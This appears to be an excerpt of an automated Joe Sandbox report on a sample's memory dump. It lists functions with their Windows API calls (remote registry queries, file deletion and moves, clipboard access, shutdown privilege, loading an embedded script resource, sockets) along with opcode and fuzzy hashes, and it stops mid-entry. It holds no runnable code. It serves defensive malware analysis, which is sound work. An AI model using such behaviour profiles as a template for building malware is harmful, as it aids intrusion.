                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: 59b319c1354a0a426dc1af74b0c4b6e55803d5693c0fe329620af472ca749ca4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 74470ba0b638545db1a36b5d483e9033154424d1a04a1cf03397f215c340ff29
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59b319c1354a0a426dc1af74b0c4b6e55803d5693c0fe329620af472ca749ca4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3931F27260425E6FCF10EFA5EC09ADF77AD9F45328F1851B1E810B30A1EB35DE858A91
                                                                                                                                                                                                                                                                                                    Function 00EAC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EAC10E,?,?), ref: 00EAD415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EAC99E
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00EACA09
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EACA2D
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EACA8C
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EACB47
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EACBB4
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EACC49
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00EACC9A
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EACD43
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EACDE2
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EACDEF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c7d53bc187cbfbc65c48772b37cb94d62bda5893dafe1ad8dbe830181457e219
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4b3285b4c4a113cc0a19f06de9447dc320d4a196cc9553baed523201fc4ca001
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7d53bc187cbfbc65c48772b37cb94d62bda5893dafe1ad8dbe830181457e219
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B0260716042009FC714DF24C891E2ABBE5EF89318F1894ADF84AEF2A2D731EC46CB51
                                                                                                                                                                                                                                                                                                    Function 00E8D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E255D1,?,?,00E64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E25871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8EAB0: GetFileAttributesW.KERNEL32(?,00E8D840), ref: 00E8EAB1
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E8D9CD
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E8DA88
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E8DA9B
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E8DAB8
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E8DAE2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E8DAC7,?,?), ref: 00E8DB5D
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00E8DAFE
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E8DB0F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                                    • Opcode ID: e941e4a78e9de836dfac8bec5e9baafc8c7f659177b3d3ffb0a703f0411f55fe
                                                                                                                                                                                                                                                                                                    • Instruction ID: e9fac0b2b4c1784d016ca571cae82ed5d6811394f959b8c30585802b54786a1b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e941e4a78e9de836dfac8bec5e9baafc8c7f659177b3d3ffb0a703f0411f55fe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26614D3190915DAECF05FBE0EE929EDB7B5AF14304F2051A5E40AB71A1EB716F09CB60
                                                                                                                                                                                                                                                                                                    Function 00E9F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a26f704b6fef9b1a030e100b712f655039fc91a38ed0cbf863df41af400010a8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2f1ac06a57c0d955c900bf1ae78bcc5f2e778dfdbbcd8a702278038638690445
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a26f704b6fef9b1a030e100b712f655039fc91a38ed0cbf863df41af400010a8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D41CE31604611AFD724CF15E888B5ABBE4FF44318F14C1A8E819EB762DB35ED41CB90
                                                                                                                                                                                                                                                                                                    Function 00E8F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8205A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E82087
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: GetLastError.KERNEL32 ref: 00E82097
                                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00E8F249
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                                    • Opcode ID: 83206acb9afb04c26f708107d9f011a18cebed28a540bfbb0a37d01bf55b98c5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 436e4e2067603f5e1edcf13ce42b7c5c2c133680cb2e515af173133d2e9bb71a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83206acb9afb04c26f708107d9f011a18cebed28a540bfbb0a37d01bf55b98c5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D01D67A6142146FEB2472B89C8ABFB72AC9B08349F151531FD0EF21F2E6615D0593A0
                                                                                                                                                                                                                                                                                                    Function 00E222AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,?), ref: 00E2233E
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00E22421
                                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00E22434
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$Proc
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 929743424-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: d9db9a1e18712221aea17c243c6710123e6044efbd1d7998cc02c5a01c63d8fb
                                                                                                                                                                                                                                                                                                    • Instruction ID: ce8807035c5525244ccd3df34cdb7279cfd9d6da003e6d65f08725baeffc0501
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9db9a1e18712221aea17c243c6710123e6044efbd1d7998cc02c5a01c63d8fb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B8149B0144021BEE23DAA3D7C98EFF259EEB42348F15210EF302F6592CA599F41C276
                                                                                                                                                                                                                                                                                                    Function 00E93A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E656C2,?,?,00000000,00000000), ref: 00E93A1E
                                                                                                                                                                                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E656C2,?,?,00000000,00000000), ref: 00E93A35
                                                                                                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00E656C2,?,?,00000000,00000000,?,?,?,?,?,?,00E266CE), ref: 00E93A45
                                                                                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00E656C2,?,?,00000000,00000000,?,?,?,?,?,?,00E266CE), ref: 00E93A56
                                                                                                                                                                                                                                                                                                    • LockResource.KERNEL32(00E656C2,?,?,00E656C2,?,?,00000000,00000000,?,?,?,?,?,?,00E266CE,?), ref: 00E93A65
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                    • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a74a942cb1ad2ca0215b73dfdd814b7d9f4d872c45cc77d28b529d278fe1ef5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 74ec699b849e7e25a8f6e07967ce9d1fcb90f40a28367e35175d1427bedcc2e6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a74a942cb1ad2ca0215b73dfdd814b7d9f4d872c45cc77d28b529d278fe1ef5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD11CB70200301BFEB208F26DC48F677BB9EBC4B14F10426CB452E62A0EBB1EC008A20
                                                                                                                                                                                                                                                                                                    Function 00E820AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E81916
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E81922
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E81931
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E81938
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E8194E
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00E81C81), ref: 00E820FB
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E82107
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00E8210E
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E82127
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00E81C81), ref: 00E8213B
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E82142
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b26d1ecd3dbcb6719df4a6972440fd62ccc7e7642ce9f0099bb39f5e324a9650
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3d41c39da6ac18fb9a896e25956d381d1b0538d5924dcbf02ec7fedaa11f9582
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b26d1ecd3dbcb6719df4a6972440fd62ccc7e7642ce9f0099bb39f5e324a9650
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A911ACB1502205FFDB14AB65CC0DBAF7BBAEF44359F24811CEA49B7120D7359945CB60
                                                                                                                                                                                                                                                                                                    Function 00E9A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00E9A5BD
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00E9A6D0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E942B9: GetInputState.USER32 ref: 00E94310
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E942B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E943AB
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00E9A5ED
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00E9A6BA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: e031e1375316c1a75e7d6ef8c79856637233ded5075240fbbf6dcc2be48d30d1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6803c7fc5d811cd4769814390ed6cb4c4b2a33badb6a4720b90e2d5564ab50ef
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e031e1375316c1a75e7d6ef8c79856637233ded5075240fbbf6dcc2be48d30d1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA417F7190420AAFDF14DFA4DC49AEEBBF8EF05314F185165E805B21A2EB309E44CFA1
                                                                                                                                                                                                                                                                                                    Function 00EA2263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EA3AD7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA3AAB: _wcslen.LIBCMT ref: 00EA3AF8
                                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EA22BA
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00EA22E1
                                                                                                                                                                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00EA2338
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00EA2343
                                                                                                                                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00EA2372
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5669693d4c2142d9629925bd05ce4bfc877f307a9d6971e318d682f29267fa2a
